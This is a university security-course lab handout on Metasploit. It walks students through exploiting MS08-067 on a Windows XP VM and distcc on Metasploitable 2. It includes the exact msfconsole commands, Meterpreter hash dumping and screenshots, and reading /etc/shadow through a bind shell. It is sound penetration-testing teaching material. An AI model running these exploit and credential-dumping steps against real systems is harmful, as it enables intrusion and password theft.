CIT 480: Securing Computer Systems

Lab #13: Metasploit

Name: ______

1: Introduction

In this lab, we will exploit vulnerabilities using the Metasploit exploitation framework ( on our Kali VM. We will use the Metasploitable 2 and Windows XP VMs as targets of our exploits. This lab will refer to their IP addresses as TARGET_IP. Read each section carefully to be sure that that you are using the correct VMs. Start all VMs at the beginning of the lab.

We will run Metasploit on the Kali VM and use the msfconsole interface to metasploit. Start the Postgresql database and Metasploit services, then start msfconsole.

# /opt/metasploit/ctlscript.sh start

# msfpro

If you encounter an error about commands being unavailable, then you are either not running the above commands as root or you are attempting to run the command on the wrong VM. Remember that the Metasploitable VM is a target VM that is exploitable by Metasploit, not a VM that runs Metasploit to target other VMs.

If you reboot the Kali VM, you will need to restart Metasploit before being able to use msfpro.

It can take a few minutes for msfpro to start the first time as it does database setup. Once it starts, you will receive the msf > prompt. To make Metasploit work faster, we need to build a cache of all of its exploits and modules as follows. While the cache is rebuilt in the background, examine the Metasploit help to learn more about the capabilities of the framework.

msf > db_rebuild_cache

msf > help

There are many web pages and videos documenting how to use msfconsole that can be found with a quick web search.

References

  1. Metasploit Unleashed,
  2. Metasploit Pro Console User's Guide,
  3. Metasploit Megaprimer,
  4. Metasploit: The Penetration Tester's Guide, No Starch Press, 2011.
  5. Microsoft Security Bulletin MS08-067,

2: Windows Exploitation with Metasploit (10%)

In this section, we will exploit our Windows VM. This means that TARGET_IP in this section refers to the IP address of the Windows VM.

We will use msfconsole to exploit the vulnerability pathced by Microsoft Security Bulletin MS08-067. This vulnerability allows an unpatched system to be compromised over the network and was used by the Conficker worm. While the vulnerability was patched in 2008, as the number 08 in the vulnerability identifier notes, it can still be found unpatched on a few systems like our Windows XP VM.

The search command in msfconsole will find exploits that match a set of keywords. The best type of keyword to use are vulnerability identifiers, so we will search for ms08-067.

msf > search ms08-067

There is only one match We select that exploit by path with the use command.

msfuse exploit/windows/smb/ms08_067_netapi

The use command changes our prompt as shown below and offers a new set of commands. You need to identify which software version is running on the target with the show targets command. Targets are different versions of the software or different platforms on which the software may be running.

msf exploit(ms08_067_netapi) > show targets

As you can see, there are dozens of different versions of Windows, mainly differing in their language configuration. These types of targets are common for memory corruption exploits on Windows platforms, since the memory locations that need to be overwritten by the exploit are slightly different for each configuration. Our target is probably number 4 or 5 on the list. However, this exploit has an auto target option that will attempt to detect the correct target for us. It defaults to this target, so we do not have to change the setting.

The show options command will list all possible options for the exploit, including current settings, whether the exploit must be specified or not, and what the option means. Even though we have set no options, many options have default settings, so we only need to set the options that have no current setting, such as RHOST, the IP address of the machine that is the target of the exploit.

msf exploit(ms08_067_netapi) > show options

msf exploit(ms08_067_netapi) > set RHOST TARGET_IP

The last item that we usually want to specify is the payload, which is the action we want the exploit to perform on the target. Payloads include a wide variety of network shell connections, reverse shell connections, and remote desktops. Available payloads for this exploit can be shown with the show payloads command.

msf exploit(ms08_067_netapi) > show payloads

This exploit defaults to a special payload, the Meterpreter. Meterpreter is short for meta-interpreter, a special payload that is part of the Metasploit framework. In addition to the basic shell functions like listing directories and viewing files, Meterpreter provides the ability to take screenshots, access hardware devices like microphones and webcams, expand the scope of exploitation by elevating privileges or dumping password hashes, and much more.

Let's run our exploit, so we can find what we can do with Meterpreter.

msf exploit(ms08_067_netapi) > exploit

Once the exploit succeeds, you will receive a Meterpreter prompt. Type “help” to see a list of commands, then experiment with a few of them to answer the questions below.

meterpreter > help

2.1: Which directory are you in?

meterpreter > pwd

2.2: What OS is the target machine running according to the prodspec.ini file?

meterpreter > cat c:\prodspec.ini

2.3: Take a screenshot of the remote system, then view it on your local system with the eog command in another terminal. Write the filename of the screenshot image in the box below.

meterpreter > screenshot

$ eog FILENAME

2.4: Windows caches the password hashes of users who login to the local system. Meterpreter can retrieve these hashes for you to crack with a tool like John the Ripper. Write the hashes in the box below.

meterpreter > hashdump

When you're done exploring, shutdown the Windows VM and exit Meterpreter.

meterpreter > shutdown

meterpreter > quit

Use the console's back command to exit from the ms08-067 exploit.

msf exploit(ms08_067_netapi) > back

msf >

3: Linux Exploitation with Metasploit (10%)

We will use msfconsole to exploit the vulnerability in distcc that was missed by Nessus. Distcc is a distributed C compilation tool used to compile large software projects quickly by using multiple machines. In this case, we search for exploits by the name of the service rather than the vulnerability identifier, as we know the service name but not the identifier.

msf > search distcc

There is only one exploit for distcc. We select that exploit by path with the use command.

msfuse exploit/unix/misc/distcc_exec

The use command changes our prompt as shown below and offers a new set of commands. You can select a target with the show targets command. Targets are different versions of the software or different platforms on which the software may be running. For the distcc exploit, there is only one target, so we do not need to specify a target. However, we do have to specify an option. The show options command will list all possible options. The option we have to specify is RHOST, the IP address of the machine that we are exploiting.

msf exploit(distcc_exec) > show options

msf exploit(distcc_exec) > set RHOST TARGET_IP

Finally, we're ready to run our exploit, which we do with the command exploit.

msf exploit(distcc_exec) > exploit

This command will generate a fair amount of output describing the progress of the exploit. If it succeeds, you will see a final line of output that states something like “Command shell session opened.” If the exploit fails, verify that the firewall on the target server permits connection to the distcc port (3632) and retry the exploit.

With the default payload for this exploit, you immediately have access to a command shell. You can type commands in and see their results even though there is no command prompt. This interface is typical of bind shells. While bind shells are not as featureful as Meterpreter, they are sometimes the only available payload for an exploit.

3.1: What user are you logged in as? Do you have administrative credentials?

id

3.2: What directory are you in?

pwd

3.3: What version of the Linux kernel is the system running? What Linux distribution is on the system?

uname -a

cat /etc/lsb-release

3.4: Who is logged onto the system?

w

3.5: Is your session listed in the set of users logged in above?

3.6: What information about user accounts can you obtain? Can you crack passwords with this information?

cat /etc/passwd

cat /etc/shadow

Exit your bind shell connection with ctrl-c, then type back to return to the msfprompt.

4: Trying an Exploit on Your Own (80%)

Identify a vulnerable service that is exploitable but that we have not yet exploited on either of the two target VMs, search for an exploit in Metasploitable, then execute the exploit against the target machine to get a shell connection. To identify a vulnerable service, you can research the OS versions (or network service versions as identified by nmap -sV) on the CVE details web site ( or you can find a service identified by a Nessus scan of the target.

In the box below, list the full set of Metasploit commands you used to do the exploit, along with their output. Do not include the output of search or show commands, like show options or show payloads.

5: Submitting the Lab

Bring a printed copy with your name on it to class on the class period after which this lab was assigned. Online students turn in via Blackboard.